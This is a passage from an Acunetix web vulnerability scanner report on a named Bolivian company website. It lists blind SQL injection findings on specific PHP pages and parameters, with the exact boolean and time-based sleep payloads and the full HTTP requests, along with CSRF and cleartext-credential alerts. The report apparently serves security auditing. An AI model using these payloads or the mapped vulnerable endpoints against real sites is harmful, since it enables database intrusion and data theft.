Acunetix Website Audit

16 May, 2014

Developer Report

Generated by Acunetix WVS Reporter (v9.0 Build 20130904)


Scan of http://www.cerroazul.com.bo:80/
Scan details

Scan information
Start time 16/05/2014 08:49:53 a.m.
Finish time 16/05/2014 09:26:18 a.m.
Scan time 36 minutes, 24 seconds
Profile Sql_Injection

Server information
Responsive True
Server banner Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_fastcgi/mod_fastcgi-SNAP-0910052141
Server OS Unix
Server technologies PHP

Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. A
malicious user can exploit these vulnerabilities and compromise the backend database
and/or deface your website.

Alerts distribution

Total alerts found 37


High 11
Medium 13
Low 0
Informational 13

Knowledge base
List of client scripts
These files contain JavaScript code referenced from the website.

- /common/js/accordionmenu.js
- /common/js/jquery.min.js
- /common/js/cargar_index.js
- /common/js/banner/jquery.nivo.slider.pack.js
- /common/js/banner/jquery.nivo.slider.js
- /common/js/gallery_bottom/jquery.js
- /common/js/gallery_bottom/jquery.easing.1.3.js
- /common/js/gallery_bottom/jquery.cssAnimate.mini.js
- /common/js/gallery_bottom/jquery.touchwipe.min.js
- /common/js/gallery_bottom/jquery.mousewheel.min.js
- /common/js/gallery_bottom/jquery.themepunch.services.min.js
- /common/js/mapa.js
- /common/js/gmaps.js
- /common/js/login.js
- /common/js/jquery.md5.js
- /common/js/cargar_contacto.js
- /common/js/comentario.js
- /common/js/cargar_cata.js
- /common/js/parametros.js
- /common/js/registrarse.js
- /common/js/jquery.history.js
- /common/js/jquery.galleriffic.js
- /common/js/jquery.opacityrollover.js
- /common/js/cargar_descripcion.js
- /common/js/actualizar_visita_cata.js
- /common/js/cargar_grupo.js
- /common/js/buscar.js
- /common/js/ubicaciones.js
- /common/js/search.js
- /common/jquery/jquery-1.4.2.js
- /common/jquery/ui/jquery.ui.core.js
- /common/jquery/ui/jquery.ui.widget.js
- /common/jquery/ui/jquery.ui.position.js
- /common/jquery/ui/jquery.ui.autocomplete.js
- /common/jquery/jquery-1.7.js
- /common/jquery/jquery-1.7.min.js

List of files with inputs


These files have at least one input (GET or POST).

- /common.php - 2 inputs
- /mapa.php - 1 inputs
- /sesion.php - 3 inputs
- /about.php - 1 inputs
- /index.php - 1 inputs
- /contacto.php - 2 inputs
- /comentario.php - 2 inputs
- /common/php/empresa/get_empresas.php - 1 inputs
- /common/php/search/get-datos.php - 1 inputs
- /common/php/search/get_datespag2.php - 1 inputs
- /common/php/catalogo/get_datos_descripcion.php - 1 inputs
- /common/php/catalogo/actualizar_cata.php - 1 inputs
- /common/php/contacto/get-datos.php - 1 inputs
- /common/php/contacto/enviar_datos.php - 1 inputs
- /common/php/comentario/get_datos.php - 1 inputs
- /common/php/comentario/get-datespag.php - 1 inputs
- /common/php/comentario/insertar_come.php - 1 inputs
- /catalogo.php - 1 inputs
- /suscribirse.php - 2 inputs
- /descripcion.php - 1 inputs
- /catalogo_grupo.php - 1 inputs
- /empresa.php - 1 inputs
- /privacidad.php - 1 inputs
- /listado.php - 1 inputs

List of external hosts


These hosts were linked from this website but they were not scanned because they are not listed in the list of hosts
allowed (Settings->Scanners settings->Scanner->List of hosts allowed).

- maps.google.com

Alerts summary

Blind SQL Injection

Affects Variations
/about.php 1
/catalogo.php 1
/catalogo_grupo.php 2
/comentario.php 1
/common.php 1
/common/php/catalogo/get_datos_descripcion.php 2
/common/php/comentario/get_datos.php 1
/common/php/search/get-datos.php 1
/contacto.php 1

HTML form without CSRF protection

Affects Variations
/comentario.php 1
/common.php 1
/contacto.php 1
/listado.php 1
/sesion.php 3
/suscribirse.php 2

User credentials are sent in clear text

Affects Variations
/listado.php 1
/sesion.php 1
/suscribirse.php 2

Broken links

Affects Variations
/common/css/ie-css3.htc 1
/common/css/menuUni.css 1
/common/css/minilistas_fcl.css 1
/common/css/minilistasfcl.css 1
/common/css/spritefcl.css 1
/common/css/spritefcl_class.css 1
/listado_empresas.php 1
/www.facebook.com/BarracaCerroAzul 1

Password type input with auto-complete enabled

Affects Variations
/empresa.php 1
/listado.php 1
/privacidad.php 1
/sesion.php 1
/suscribirse.php 1


Alert details

Blind SQL Injection

Severity High
Type Validation
Reported by module Scripting (Blind_Sql_Injection.script)

Description
This script is possibly vulnerable to SQL Injection attacks.

SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.
An SQL injection occurs when a web application accepts user input that is placed directly into a SQL statement and does not
properly filter out dangerous characters.

This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is
relatively easy to protect against, a large number of web applications are vulnerable.

Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information.

Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access
for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub
selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell
commands on the underlying operating system.

Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server
functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
Affected items

/about.php
Details
URL encoded GET input id was set to 2/**/AND/**/810=810

Tests performed:
- 0+0+0+2 => TRUE
- 0+810*805+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 810=810 => TRUE
- 2 AND 3+1-1-1=1 AND 810=810 => FALSE[ ... (line truncated)
Request headers
GET /about.php?id=2/**/AND/**/810%3d810 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/catalogo.php
Details
URL encoded GET input id was set to 2/**/AND/**/943=943

Tests performed:
- 0+0+0+2 => TRUE
- 0+943*938+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 943=943 => TRUE
- 2 AND 3+1-1-1=1 AND 943=943 => FALSE[ ... (line truncated)
Request headers
GET /catalogo.php?id=2/**/AND/**/943%3d943 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/catalogo_grupo.php
Details
URL encoded GET input id_fami was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

Tests performed:
- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ =>
6.63 s
- if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ ...
(line truncated)
Request headers
GET
/catalogo_grupo.php?id=1&id_fami=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3ds
ysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&id_grupo
=13 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/catalogo_grupo.php
Details
URL encoded GET input id_grupo was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

Tests performed:
- if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ =>
9.532 s
- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR" ...
(line truncated)
Request headers
GET
/catalogo_grupo.php?id=1&id_fami=3&id_grupo=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(i
f(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22
*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/comentario.php
Details
URL encoded GET input id was set to 2/**/AND/**/505=505

Tests performed:
- 0+0+0+2 => TRUE
- 0+505*500+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 505=505 => TRUE
- 2 AND 3+1-1-1=1 AND 505=505 => FALSE[ ... (line truncated)
Request headers
GET /comentario.php?id=2/**/AND/**/505%3d505 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common.php
Details
URL encoded GET input id was set to 2/**/AND/**/757=757

Tests performed:
- 0+0+0+2 => TRUE
- 0+757*752+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 757=757 => TRUE
- 2 AND 3+1-1-1=1 AND 757=757 => FALSE[ ... (line truncated)
Request headers
GET /common.php?id=2/**/AND/**/757%3d757 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/php/catalogo/get_datos_descripcion.php
Details
URL encoded GET input id_cata was set to 9/**/AND/**/407=407

Tests performed:
- 0+0+0+9 => TRUE
- 0+407*402+9 => FALSE
- 19-5-2-999 => FALSE
- 19-5-2-3 => TRUE
- 19-2*5+0+0+1-1 => TRUE
- 19-2*6+0+0+1-1 => FALSE
- 9 AND 2+1-1-1=1 AND 407=407 => TRUE
- 9 AND 3+1-1-1=1 AND 407=407 => FALSE[/b ... (line truncated)
Request headers
GET
/common/php/catalogo/get_datos_descripcion.php?id_cata=9/**/AND/**/407%3d407&id_empre=1
HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/php/catalogo/get_datos_descripcion.php
Details
URL encoded GET input id_empre was set to 1/**/AND/**/938=938

Tests performed:
- 0+0+0+1 => TRUE
- 0+938*933+1 => FALSE
- 11-5-2-999 => FALSE
- 11-5-2-3 => TRUE
- 11-2*5+0+0+1-1 => TRUE
- 11-2*6+0+0+1-1 => FALSE
- 1 AND 2+1-1-1=1 AND 938=938 => TRUE
- 1 AND 3+1-1-1=1 AND 938=938 => FALSE[/ ... (line truncated)
Request headers
GET
/common/php/catalogo/get_datos_descripcion.php?id_cata=9&id_empre=1/**/AND/**/938%3d938
HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/common/php/comentario/get_datos.php
Details
URL encoded GET input id_empre was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

Tests performed:
- if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>
3.105 s
- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR" ...
(line truncated)
Request headers
GET
/common/php/comentario/get_datos.php?id_empre=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR
(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%
22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/php/search/get-datos.php
Details
URL encoded GET input id_dpto was set to 1/**/AND/**/32=32

Tests performed:
- 0+0+0+1 => TRUE
- 0+32*27+1 => FALSE
- 11-5-2-999 => FALSE
- 11-5-2-3 => TRUE
- 11-2*5+0+0+1-1 => TRUE
- 11-2*6+0+0+1-1 => FALSE
- 1 AND 2+1-1-1=1 AND 32=32 => TRUE
- 1 AND 3+1-1-1=1 AND 32=32 => FALSE[/li ... (line truncated)
Request headers
GET /common/php/search/get-datos.php?id_dpto=1/**/AND/**/32%3d32&parametro= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/contacto.php
Details
URL encoded GET input id was set to 2/**/AND/**/918=918

Tests performed:
- 0+0+0+2 => TRUE
- 0+918*913+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 918=918 => TRUE
- 2 AND 3+1-1-1=1 AND 918=918 => FALSE[ ... (line truncated)
Request headers
GET /contacto.php?id=2/**/AND/**/918%3d918 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

HTML form without CSRF protection

Severity Medium
Type Informational
Reported by module Crawler

Description
This alert may be a false positive; manual confirmation is required.
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a
type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website
trusts.

Acunetix WVS found an HTML form with no apparent CSRF protection implemented. Consult details for more information
about the affected HTML form.

Impact
An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF
exploit can compromise end user data and operation in the case of a normal user. If the targeted end user is the administrator
account, this can compromise the entire web application.
Recommendation
Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.

Affected items

/comentario.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/comentario.php
Form method: GET

Form inputs:

- name [Text]
- comentario [TextArea]

Request headers
GET /comentario.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/common.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/common.php
Form method: GET

Form inputs:

- name [Text]
- phone [Text]
- mensaje [TextArea]

Request headers
GET /common.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/contacto.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/contacto.php
Form method: GET

Form inputs:

- name [Text]
- correo [Text]
- phone [Text]
- mensaje [TextArea]

Request headers
GET /contacto.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/listado.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/listado.php
Form method: POST

Form inputs:

- txt_nombre [Text]
- password [Password]

Request headers
GET /listado.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/contacto.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/sesion.php
Form method: POST

Form inputs:

- usuario [Text]
- phone [Text]
- phone [Text]
- password [Text]

Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/sesion.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/sesion.php
Form method: POST

Form inputs:

- phone [Text]

Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/sesion.php
Form method: POST

Form inputs:

- phone [Text]
- password [Password]

Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/suscribirse.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/suscribirse.php
Form method: POST

Form inputs:

- txt_usuario [Text]
- password [Password]

Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/suscribirse.php
Form method: POST

Form inputs:

- txt_nombre [Text]
- name [Text]
- phone [Text]
- password [Password]

Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

User credentials are sent in clear text

Severity Medium
Type Informational
Reported by module Crawler

Description
User credentials are transmitted over an unencrypted channel. This information should always be transferred via an
encrypted channel (HTTPS) to avoid being intercepted by malicious users.

Impact
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.
Recommendation
Because user credentials are considered sensitive information, they should always be transferred to the server over an
encrypted connection (HTTPS).

Affected items

/listado.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/listado.php
Form method: POST

Form inputs:

- txt_nombre [Text]
- password [Password]

Request headers
GET /listado.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/contacto.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/sesion.php
Form method: POST

Form inputs:

- phone [Text]
- password [Password]

Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/suscribirse.php
Form method: POST

Form inputs:

- txt_usuario [Text]
- password [Password]

Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/suscribirse.php
Form method: POST

Form inputs:

- txt_nombre [Text]
- name [Text]
- phone [Text]
- password [Password]

Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Broken links

Severity Informational
Type Informational
Reported by module Crawler

Description
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error.
This page was linked from the website but it is inaccessible.

Impact
Problems navigating the site.
Recommendation
Remove the links to this file or make it accessible.

Affected items

/common/css/ie-css3.htc
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/ie-css3.htc HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common/css/menu_acor.css
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/menuUni.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/menuUni.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/common/css/minilistas_fcl.css
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/minilistas_fcl.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
